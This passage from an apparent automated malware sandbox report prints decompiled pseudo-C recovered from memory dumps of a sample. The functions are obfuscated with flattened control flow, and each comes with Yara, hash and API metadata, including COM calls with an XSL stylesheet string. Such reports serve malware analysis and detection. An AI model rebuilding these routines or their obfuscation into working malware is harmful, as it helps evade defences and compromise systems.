                                                      								if(__eflags != 0) {
                                                      									continue;
                                                      								} else {
                                                      									return _t202;
                                                      								}
                                                      								L22:
                                                      							} else {
                                                      								_t209 = E002376DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
                                                      								_t247 =  &(_t247[2]);
                                                      								 *((intOrPtr*)(_t241 + 4)) = _t209;
                                                      								_t237 = 0xdd7d922;
                                                      								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
                                                      								goto L1;
                                                      							}
                                                      						}
                                                      						_push(_t216);
                                                      						_push(_t216);
                                                      						_t224 = 0x38;
                                                      						_t208 = E00238736(_t224);
                                                      						_t241 = _t208;
                                                      						__eflags = _t241;
                                                      						if(__eflags != 0) {
                                                      							_t242 = 0xe9e2879;
                                                      							_t202 = 0x303a6ade;
                                                      							goto L12;
                                                      						}
                                                      						return _t208;
                                                      						goto L22;
                                                      					}
                                                      					E0024422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
                                                      					_t242 = 0x28cfd81a;
                                                      					_t216 = 0x2c1c6573;
                                                      					_t237 = 0xdd7d922;
                                                      					goto L17;
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$4$6x$XLq$e)$}:{$!$*$*
                                                      • API String ID: 0-323616845
                                                      • Opcode ID: cc624bfb40c0737e49e44d0403b40d13e7c017f7ecb356e751992e642ec36a5f
                                                      • Instruction ID: 55e8556b02f7723b16d48fc4e41896b89856b96d89fda111c489c37b9627ec01
                                                      • Opcode Fuzzy Hash: cc624bfb40c0737e49e44d0403b40d13e7c017f7ecb356e751992e642ec36a5f
                                                      • Instruction Fuzzy Hash: DDA16272918341CFD368CF25C88940BFBE1FB84718F508A1DF5899A260D3B5CA19CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E002463C1() {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				void* _t166;
                                                      				signed int _t167;
                                                      				signed int _t168;
                                                      				void* _t173;
                                                      				void* _t191;
                                                      				intOrPtr _t196;
                                                      				signed int _t197;
                                                      				signed int _t198;
                                                      				signed int _t199;
                                                      				signed int _t200;
                                                      				signed int _t201;
                                                      				intOrPtr _t202;
                                                      				intOrPtr* _t203;
                                                      				signed int _t204;
                                                      				signed int* _t205;
                                                      
                                                      				_t205 =  &_v76;
                                                      				_v8 = 0x6b5f41;
                                                      				_t196 = 0;
                                                      				_t173 = 0x1e312b00;
                                                      				_v4 = 0;
                                                      				_v40 = 0xbf50;
                                                      				_v40 = _v40 + 0xffff4d7d;
                                                      				_v40 = _v40 ^ 0x1ff0eb0a;
                                                      				_v40 = _v40 ^ 0x1ff1e7c7;
                                                      				_v68 = 0xcba5;
                                                      				_v68 = _v68 + 0xffffed4d;
                                                      				_v68 = _v68 >> 9;
                                                      				_v68 = _v68 | 0x05a9bf19;
                                                      				_v68 = _v68 ^ 0x05a9faf6;
                                                      				_v52 = 0xab70;
                                                      				_v52 = _v52 + 0xffff3c3f;
                                                      				_v52 = _v52 ^ 0x3be47de3;
                                                      				_v52 = _v52 ^ 0xc41b8c81;
                                                      				_v20 = 0x4c56;
                                                      				_t27 =  &_v20; // 0x4c56
                                                      				_t197 = 0x53;
                                                      				_v20 =  *_t27 / _t197;
                                                      				_v20 = _v20 ^ 0x00006ba4;
                                                      				_v44 = 0x4e4f;
                                                      				_v44 = _v44 + 0xffff1389;
                                                      				_v44 = _v44 ^ 0x6e1bb2f9;
                                                      				_v44 = _v44 ^ 0x91e4a702;
                                                      				_v48 = 0x9b6d;
                                                      				_t198 = 0x15;
                                                      				_v48 = _v48 / _t198;
                                                      				_v48 = _v48 << 0xe;
                                                      				_v48 = _v48 ^ 0x01d9d03e;
                                                      				_v16 = 0x7c52;
                                                      				_t199 = 0x3a;
                                                      				_v16 = _v16 * 0x14;
                                                      				_v16 = _v16 ^ 0x0009e5e2;
                                                      				_v64 = 0x462a;
                                                      				_v64 = _v64 ^ 0x0e1a4a8f;
                                                      				_v64 = _v64 >> 3;
                                                      				_v64 = _v64 >> 0xc;
                                                      				_v64 = _v64 ^ 0x000014fb;
                                                      				_v72 = 0x5cc4;
                                                      				_v72 = _v72 / _t199;
                                                      				_v72 = _v72 + 0x2f24;
                                                      				_v72 = _v72 + 0xd2bc;
                                                      				_v72 = _v72 ^ 0x000179b4;
                                                      				_v24 = 0x30ff;
                                                      				_t200 = 0x2a;
                                                      				_v24 = _v24 / _t200;
                                                      				_v24 = _v24 ^ 0x00007cf0;
                                                      				_v28 = 0x85cd;
                                                      				_v28 = _v28 ^ 0xf8a4d4b8;
                                                      				_v28 = _v28 ^ 0xf8a43927;
                                                      				_v76 = 0x1878;
                                                      				_v76 = _v76 ^ 0x7099aca3;
                                                      				_v76 = _v76 ^ 0x4acb853d;
                                                      				_v76 = _v76 + 0xffff4ab7;
                                                      				_v76 = _v76 ^ 0x3a511503;
                                                      				_v32 = 0x1800;
                                                      				_v32 = _v32 << 1;
                                                      				_v32 = _v32 ^ 0x00002132;
                                                      				_v60 = 0xa25b;
                                                      				_v60 = _v60 * 0x67;
                                                      				_v60 = _v60 + 0x9ac4;
                                                      				_v60 = _v60 ^ 0x004180d5;
                                                      				_v36 = 0x47a4;
                                                      				_v36 = _v36 << 9;
                                                      				_v36 = _v36 ^ 0xcd228633;
                                                      				_v36 = _v36 ^ 0xcdadbf4b;
                                                      				_v12 = 0xe30d;
                                                      				_v12 = _v12 << 8;
                                                      				_v12 = _v12 ^ 0x00e3661f;
                                                      				_t172 = _v12;
                                                      				_t204 = _v12;
                                                      				_t201 = _v12;
                                                      				_v56 = 0x2740;
                                                      				_v56 = _v56 ^ 0x239771de;
                                                      				_v56 = _v56 + 0xfffffe7e;
                                                      				_v56 = _v56 ^ 0x23985523;
                                                      				while(1) {
                                                      					L1:
                                                      					_t191 = 0x5c;
                                                      					while(1) {
                                                      						L2:
                                                      						do {
                                                      							L3:
                                                      							while(_t173 != 0x3fc1d7) {
                                                      								if(_t173 == 0x353ab5a) {
                                                      									_t202 =  *0x24ca2c; // 0x698300
                                                      									_t203 = _t202 + 0x230;
                                                      									while( *_t203 != _t191) {
                                                      										_t203 = _t203 + 2;
                                                      									}
                                                      									_t201 = _t203 + 2;
                                                      									_t173 = 0x6fcf9e2;
                                                      									goto L2;
                                                      								} else {
                                                      									if(_t173 == 0x6adc8a5) {
                                                      										_t167 = E0023F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
                                                      										_t205 =  &(_t205[5]);
                                                      										_t204 = _t167;
                                                      										_t166 = 0xd265085;
                                                      										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
                                                      										_t191 = 0x5c;
                                                      										continue;
                                                      									} else {
                                                      										if(_t173 == 0x6fcf9e2) {
                                                      											_t168 = E00232959(_t173, _v68, _v52, _v20, _v56);
                                                      											_t172 = _t168;
                                                      											_t205 =  &(_t205[4]);
                                                      											if(_t168 != 0) {
                                                      												_t173 = 0x6adc8a5;
                                                      												goto L1;
                                                      											}
                                                      										} else {
                                                      											if(_t173 == _t166) {
                                                      												E0024507B(_v72, _v24, _v28, _v76, _t204);
                                                      												_t205 =  &(_t205[3]);
                                                      												_t196 =  !=  ? 1 : _t196;
                                                      												_t173 = 0x17a504e8;
                                                      												while(1) {
                                                      													L1:
                                                      													_t191 = 0x5c;
                                                      													goto L2;
                                                      												}
                                                      											} else {
                                                      												if(_t173 == 0x17a504e8) {
                                                      													E00235FB2(_v32, _v60, _t204);
                                                      													_t173 = 0x3fc1d7;
                                                      													while(1) {
                                                      														L1:
                                                      														_t191 = 0x5c;
                                                      														L2:
                                                      														goto L3;
                                                      													}
                                                      												} else {
                                                      													if(_t173 != 0x1e312b00) {
                                                      														goto L21;
                                                      													} else {
                                                      														_t173 = 0x353ab5a;
                                                      														continue;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L22;
                                                      							}
                                                      							E00235FB2(_v36, _v12, _t172);
                                                      							_t173 = 0x26181ebc;
                                                      							_t166 = 0xd265085;
                                                      							_t191 = 0x5c;
                                                      							L21:
                                                      						} while (_t173 != 0x26181ebc);
                                                      						L22:
                                                      						return _t196;
                                                      					}
                                                      				}
                                                      			}






































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
                                                      • API String ID: 0-175875280
                                                      • Opcode ID: 1daf34144ef734eb3a5419613333aadc6e80ac1f714baf8e39de4d9814b9b9a1
                                                      • Instruction ID: fc1050d7048dcb6a35f56a5970813d965125546f86201c0439d57fc77c32cbe7
                                                      • Opcode Fuzzy Hash: 1daf34144ef734eb3a5419613333aadc6e80ac1f714baf8e39de4d9814b9b9a1
                                                      • Instruction Fuzzy Hash: 5D8155711183819FD798CF24C49A81BBBF1FBC5358F504A1DF686466A1C7B9CA58CB83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00242349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                      				char _v16;
                                                      				char _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				void* _t153;
                                                      				void* _t168;
                                                      				signed int _t172;
                                                      				char _t177;
                                                      				signed int _t178;
                                                      				void* _t181;
                                                      				char* _t186;
                                                      				signed int _t206;
                                                      				signed int _t207;
                                                      				signed int _t208;
                                                      				signed int _t209;
                                                      				signed int _t210;
                                                      				signed int* _t214;
                                                      
                                                      				_push(_a16);
                                                      				_push(0x40);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t153);
                                                      				_v20 = 0x10;
                                                      				_t214 =  &(( &_v80)[6]);
                                                      				_v60 = 0xafa2;
                                                      				_v60 = _v60 ^ 0xad7cd4b0;
                                                      				_t178 = 0;
                                                      				_v60 = _v60 | 0x7a339cd1;
                                                      				_t181 = 0x15b39dc0;
                                                      				_v60 = _v60 ^ 0xff7ff485;
                                                      				_v64 = 0xe220;
                                                      				_v64 = _v64 >> 2;
                                                      				_v64 = _v64 | 0x618d1066;
                                                      				_v64 = _v64 ^ 0x618d4123;
                                                      				_v28 = 0xfe94;
                                                      				_t206 = 0x17;
                                                      				_v28 = _v28 / _t206;
                                                      				_v28 = _v28 ^ 0x000043c3;
                                                      				_v32 = 0x6fe3;
                                                      				_v32 = _v32 >> 1;
                                                      				_v32 = _v32 ^ 0x000078b7;
                                                      				_v36 = 0x3688;
                                                      				_t207 = 0x69;
                                                      				_v36 = _v36 * 0x5a;
                                                      				_v36 = _v36 ^ 0x00137d17;
                                                      				_v24 = 0x8157;
                                                      				_v24 = _v24 | 0x6dbfc3a0;
                                                      				_v24 = _v24 ^ 0x6dbfb45a;
                                                      				_v80 = 0xe945;
                                                      				_v80 = _v80 / _t207;
                                                      				_v80 = _v80 ^ 0xcc46d226;
                                                      				_t208 = 0x62;
                                                      				_v80 = _v80 / _t208;
                                                      				_v80 = _v80 ^ 0x0215c355;
                                                      				_v48 = 0x42ef;
                                                      				_v48 = _v48 + 0xffff3840;
                                                      				_v48 = _v48 << 4;
                                                      				_v48 = _v48 ^ 0xfff789fd;
                                                      				_v72 = 0xbf2b;
                                                      				_v72 = _v72 | 0xc326a1c7;
                                                      				_t209 = 0x4b;
                                                      				_v72 = _v72 / _t209;
                                                      				_v72 = _v72 | 0xd12f9700;
                                                      				_v72 = _v72 ^ 0xd3bfbe8a;
                                                      				_v52 = 0xfa61;
                                                      				_v52 = _v52 << 3;
                                                      				_v52 = _v52 + 0x5488;
                                                      				_v52 = _v52 ^ 0x00084626;
                                                      				_v56 = 0xb5dc;
                                                      				_v56 = _v56 | 0x6ca6e5ac;
                                                      				_v56 = _v56 * 0x5e;
                                                      				_v56 = _v56 ^ 0xe54e28a7;
                                                      				_v76 = 0xbf9d;
                                                      				_v76 = _v76 + 0xdb7b;
                                                      				_v76 = _v76 + 0xffff5618;
                                                      				_v76 = _v76 | 0xc179f847;
                                                      				_v76 = _v76 ^ 0xc1798349;
                                                      				_v40 = 0xd8e6;
                                                      				_v40 = _v40 + 0x2ceb;
                                                      				_v40 = _v40 + 0x406a;
                                                      				_v40 = _v40 ^ 0x0001168e;
                                                      				_v68 = 0x1b9c;
                                                      				_t210 = 0x7a;
                                                      				_v68 = _v68 * 0x38;
                                                      				_v68 = _v68 + 0xa456;
                                                      				_v68 = _v68 >> 0xe;
                                                      				_v68 = _v68 ^ 0x00002836;
                                                      				_v44 = 0x7a08;
                                                      				_v44 = _v44 << 0xd;
                                                      				_v44 = _v44 / _t210;
                                                      				_v44 = _v44 ^ 0x00205e6a;
                                                      				while(_t181 != 0x12ef740) {
                                                      					if(_t181 == 0x13e246ff) {
                                                      						__eflags = _v16;
                                                      						_t186 =  &_v16;
                                                      						while(__eflags != 0) {
                                                      							_t177 =  *_t186;
                                                      							__eflags = _t177 - 0x30;
                                                      							if(_t177 < 0x30) {
                                                      								L11:
                                                      								__eflags = _t177 - 0x61;
                                                      								if(_t177 < 0x61) {
                                                      									L13:
                                                      									__eflags = _t177 - 0x41;
                                                      									if(_t177 < 0x41) {
                                                      										L15:
                                                      										 *_t186 = 0x58;
                                                      									} else {
                                                      										__eflags = _t177 - 0x5a;
                                                      										if(_t177 > 0x5a) {
                                                      											goto L15;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eflags = _t177 - 0x7a;
                                                      									if(_t177 > 0x7a) {
                                                      										goto L13;
                                                      									}
                                                      								}
                                                      							} else {
                                                      								__eflags = _t177 - 0x39;
                                                      								if(_t177 > 0x39) {
                                                      									goto L11;
                                                      								}
                                                      							}
                                                      							_t186 = _t186 + 1;
                                                      							__eflags =  *_t186;
                                                      						}
                                                      						_t181 = 0x12ef740;
                                                      						continue;
                                                      					} else {
                                                      						if(_t181 == 0x15b39dc0) {
                                                      							_t181 = 0x3a71512f;
                                                      							continue;
                                                      						} else {
                                                      							if(_t181 != 0x3a71512f) {
                                                      								L19:
                                                      								__eflags = _t181 - 0x2b24b5a2;
                                                      								if(__eflags != 0) {
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								if(E0023602C(_v60,  &_v16,  &_v20, _v64) != 0) {
                                                      									_t181 = 0x13e246ff;
                                                      									continue;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					return _t178;
                                                      				}
                                                      				_push(0x24c030);
                                                      				_push(_v36);
                                                      				_t168 = E0024878F(_v28, _v32, __eflags);
                                                      				E002431E2(__eflags);
                                                      				_t143 =  &_v56; // 0x205e6a
                                                      				_t172 = E00246A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
                                                      				__eflags = _t172;
                                                      				_t152 = _t172 > 0;
                                                      				__eflags = _t152;
                                                      				_t178 = 0 | _t152;
                                                      				E00242025(_v40, _t168, _v68, _v44);
                                                      				_t214 =  &(_t214[0xc]);
                                                      				_t181 = 0x2b24b5a2;
                                                      				goto L19;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
                                                      • API String ID: 0-892457230
                                                      • Opcode ID: 3c2d2a3d4f6714c1689d69c28e5d17223dbcc16a4b78aa89dc05da0b72ccb0c0
                                                      • Instruction ID: 1c4b9c5b944197ee619386107a8f09b40357ee13263e6e0408a587dbab6d3ad1
                                                      • Opcode Fuzzy Hash: 3c2d2a3d4f6714c1689d69c28e5d17223dbcc16a4b78aa89dc05da0b72ccb0c0
                                                      • Instruction Fuzzy Hash: 83818571519341DFD768CF26C98A51BBBE1BBC1B18F80490DF1859A2A0D7B5CA1ACF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
                                                      • CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
                                                      • PropVariantClear.OLE32(?), ref: 10002E75
                                                      • SysFreeString.OLEAUT32(00000000), ref: 10002E7E
                                                      • SysFreeString.OLEAUT32(00000000), ref: 10002E97
                                                      Strings
                                                      • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: String$Free$AllocClearCreateInstancePropVariant
                                                      • String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
                                                      • API String ID: 2501108336-1018649646
                                                      • Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                                      • Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
                                                      • Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                                      • Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E00249B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                      				signed int* _v4;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				intOrPtr _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				unsigned int _v112;
                                                      				signed int _v116;
                                                      				void* _t241;
                                                      				intOrPtr _t259;
                                                      				void* _t260;
                                                      				intOrPtr _t268;
                                                      				intOrPtr _t269;
                                                      				intOrPtr _t270;
                                                      				intOrPtr _t274;
                                                      				intOrPtr* _t281;
                                                      				signed int _t283;
                                                      				void* _t315;
                                                      				intOrPtr* _t316;
                                                      				signed int _t317;
                                                      				signed int _t318;
                                                      				signed int _t319;
                                                      				signed int _t320;
                                                      				signed int _t321;
                                                      				signed int* _t322;
                                                      				signed int* _t325;
                                                      				void* _t327;
                                                      
                                                      				_t281 = _a8;
                                                      				_push(_t281);
                                                      				_push(_a4);
                                                      				_t316 = __ecx;
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t241);
                                                      				_v76 = 0xd801;
                                                      				_t325 =  &(( &_v116)[4]);
                                                      				_v76 = _v76 >> 6;
                                                      				_t315 = 0;
                                                      				_t283 = 0xafaf7d2;
                                                      				_t317 = 6;
                                                      				_v76 = _v76 * 0x2a;
                                                      				_v76 = _v76 ^ 0x0000b202;
                                                      				_v80 = 0xa1a8;
                                                      				_v80 = _v80 | 0xe917477a;
                                                      				_v80 = _v80 << 2;
                                                      				_v80 = _v80 ^ 0xa45f8c0e;
                                                      				_v84 = 0x144b;
                                                      				_v84 = _v84 + 0xffffbc75;
                                                      				_v84 = _v84 * 0x6d;
                                                      				_v84 = _v84 ^ 0xffeb93ca;
                                                      				_v52 = 0x2e4b;
                                                      				_v52 = _v52 | 0x557249c0;
                                                      				_v52 = _v52 ^ 0x346b51fe;
                                                      				_v52 = _v52 ^ 0x611902e1;
                                                      				_v56 = 0xfad0;
                                                      				_v56 = _v56 + 0xffff1342;
                                                      				_v56 = _v56 ^ 0x8fd20197;
                                                      				_v56 = _v56 ^ 0x8fd21d65;
                                                      				_v96 = 0x8e39;
                                                      				_v96 = _v96 + 0xd833;
                                                      				_v96 = _v96 + 0xffffc0bd;
                                                      				_v96 = _v96 >> 0xa;
                                                      				_v96 = _v96 ^ 0x000036ba;
                                                      				_v12 = 0xb209;
                                                      				_v12 = _v12 ^ 0xf6f529e5;
                                                      				_v12 = _v12 ^ 0xf6f5ec43;
                                                      				_v64 = 0xc247;
                                                      				_v64 = _v64 + 0xffff53d4;
                                                      				_v64 = _v64 << 9;
                                                      				_v64 = _v64 ^ 0x002c2f20;
                                                      				_v100 = 0x41c0;
                                                      				_v100 = _v100 | 0x528356d8;
                                                      				_v100 = _v100 ^ 0x6d95e5a5;
                                                      				_v100 = _v100 >> 1;
                                                      				_v100 = _v100 ^ 0x1f8b2fe0;
                                                      				_v16 = 0x904b;
                                                      				_v16 = _v16 + 0x3d62;
                                                      				_v16 = _v16 ^ 0x0000a85c;
                                                      				_v68 = 0xf7e0;
                                                      				_v68 = _v68 | 0xcc3d0ce1;
                                                      				_v68 = _v68 >> 7;
                                                      				_v68 = _v68 ^ 0x01982b66;
                                                      				_v72 = 0x69a0;
                                                      				_v72 = _v72 / _t317;
                                                      				_v72 = _v72 ^ 0xd5ac5c66;
                                                      				_v72 = _v72 ^ 0xd5ac219b;
                                                      				_v20 = 0x9739;
                                                      				_v20 = _v20 << 2;
                                                      				_v20 = _v20 ^ 0x000260e8;
                                                      				_v24 = 0xc564;
                                                      				_t318 = 0x2c;
                                                      				_v24 = _v24 / _t318;
                                                      				_v24 = _v24 ^ 0x00005d30;
                                                      				_v88 = 0xe78a;
                                                      				_v88 = _v88 >> 1;
                                                      				_v88 = _v88 << 4;
                                                      				_v88 = _v88 ^ 0x00070feb;
                                                      				_v28 = 0x7421;
                                                      				_v28 = _v28 + 0xffff545c;
                                                      				_v28 = _v28 ^ 0xfffff127;
                                                      				_v32 = 0x3ef3;
                                                      				_t319 = 0x23;
                                                      				_v32 = _v32 * 0x1e;
                                                      				_v32 = _v32 ^ 0x00070388;
                                                      				_v36 = 0x1f6a;
                                                      				_v36 = _v36 << 0xa;
                                                      				_v36 = _v36 ^ 0x007d8833;
                                                      				_v104 = 0xc791;
                                                      				_v104 = _v104 + 0xffffa2ac;
                                                      				_v104 = _v104 * 0x2b;
                                                      				_v104 = _v104 + 0x587f;
                                                      				_v104 = _v104 ^ 0x00127594;
                                                      				_v40 = 0xa663;
                                                      				_v40 = _v40 + 0xffffc5d4;
                                                      				_v40 = _v40 ^ 0x00001ad7;
                                                      				_v44 = 0x2b76;
                                                      				_v44 = _v44 << 0xc;
                                                      				_v44 = _v44 ^ 0x02b774b0;
                                                      				_v92 = 0xa27;
                                                      				_v92 = _v92 / _t319;
                                                      				_v92 = _v92 + 0xffff3569;
                                                      				_v92 = _v92 ^ 0xffff2eae;
                                                      				_v108 = 0xf211;
                                                      				_t320 = 0x54;
                                                      				_v108 = _v108 / _t320;
                                                      				_v108 = _v108 >> 0xb;
                                                      				_v108 = _v108 | 0x89ac3126;
                                                      				_v108 = _v108 ^ 0x89ac4c52;
                                                      				_v112 = 0x8d71;
                                                      				_v112 = _v112 >> 0xa;
                                                      				_v112 = _v112 | 0xeb52e524;
                                                      				_v112 = _v112 >> 4;
                                                      				_v112 = _v112 ^ 0x0eb57242;
                                                      				_v48 = 0x270e;
                                                      				_v48 = _v48 | 0xda2d7f86;
                                                      				_v48 = _v48 ^ 0xda2d74b2;
                                                      				_v116 = 0xd303;
                                                      				_v116 = _v116 ^ 0x52d81e99;
                                                      				_t321 = 0x2e;
                                                      				_t322 = _v4;
                                                      				_v116 = _v116 / _t321;
                                                      				_v116 = _v116 * 0x47;
                                                      				_v116 = _v116 ^ 0x7fdf43a3;
                                                      				while(1) {
                                                      					_t258 = _v60;
                                                      					while(1) {
                                                      						L2:
                                                      						_t327 = _t283 - 0x1af8f879;
                                                      						if(_t327 <= 0) {
                                                      							break;
                                                      						}
                                                      						if(_t283 == 0x20f5637b) {
                                                      							_t259 =  *0x24ca20; // 0x0
                                                      							_t260 = E00241B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
                                                      							_t325 =  &(_t325[5]);
                                                      							if(_t260 == 0) {
                                                      								_t283 = 0x33905d8a;
                                                      								L26:
                                                      								if(_t283 == 0xc271ab7) {
                                                      									L30:
                                                      									return _t315;
                                                      								}
                                                      								while(1) {
                                                      									_t258 = _v60;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							_t283 = 0x1af8f879;
                                                      							while(1) {
                                                      								_t258 = _v60;
                                                      								goto L2;
                                                      							}
                                                      						}
                                                      						if(_t283 == 0x28aacb6e) {
                                                      							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
                                                      								goto L30;
                                                      							}
                                                      							_t283 = 0x351bb9b3;
                                                      							continue;
                                                      						}
                                                      						if(_t283 == 0x33905d8a) {
                                                      							if(_t315 == 0) {
                                                      								E0023F536(_v52, _v56, _v96,  *_t316);
                                                      							}
                                                      							goto L30;
                                                      						}
                                                      						if(_t283 != 0x351bb9b3) {
                                                      							goto L26;
                                                      						}
                                                      						_t283 = 0xa3bf63c;
                                                      					}
                                                      					if(_t327 == 0) {
                                                      						E00242674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
                                                      						_t325 =  &(_t325[5]);
                                                      						_t283 = 0xc483d1b;
                                                      						while(1) {
                                                      							_t258 = _v60;
                                                      							goto L2;
                                                      						}
                                                      					}
                                                      					if(_t283 == 0xa3bf63c) {
                                                      						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
                                                      						_push(_t283);
                                                      						_push(_t283);
                                                      						_t268 = E00238736( *((intOrPtr*)(_t316 + 4)));
                                                      						 *_t316 = _t268;
                                                      						if(_t268 == 0) {
                                                      							goto L30;
                                                      						}
                                                      						_t269 =  *_t281;
                                                      						_t283 = 0x20f5637b;
                                                      						_v4 = _t269;
                                                      						_t258 = _t269 + 0x74;
                                                      						_v60 = _t269 + 0x74;
                                                      						_t322 =  &_v116;
                                                      						goto L2;
                                                      					}
                                                      					if(_t283 == 0xafaf7d2) {
                                                      						_t283 = 0x28aacb6e;
                                                      						goto L2;
                                                      					}
                                                      					if(_t283 == 0xc483d1b) {
                                                      						_t270 =  *0x24ca20; // 0x0
                                                      						E002355D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
                                                      						_t325 =  &(_t325[0xa]);
                                                      						asm("sbb ecx, ecx");
                                                      						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
                                                      						while(1) {
                                                      							_t258 = _v60;
                                                      							goto L2;
                                                      						}
                                                      					}
                                                      					if(_t283 == 0x19944913) {
                                                      						_t274 =  *0x24ca20; // 0x0
                                                      						_push(_t283);
                                                      						_push(_t283);
                                                      						E0024838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
                                                      						_t325 =  &(_t325[8]);
                                                      						_t315 =  !=  ? 1 : _t315;
                                                      						_t283 = 0x199ab82a;
                                                      						while(1) {
                                                      							_t258 = _v60;
                                                      							goto L2;
                                                      						}
                                                      					}
                                                      					if(_t283 != 0x199ab82a) {
                                                      						goto L26;
                                                      					}
                                                      					_push(_t283);
                                                      					_push(_t283);
                                                      					E00235F43(_t283, _v8);
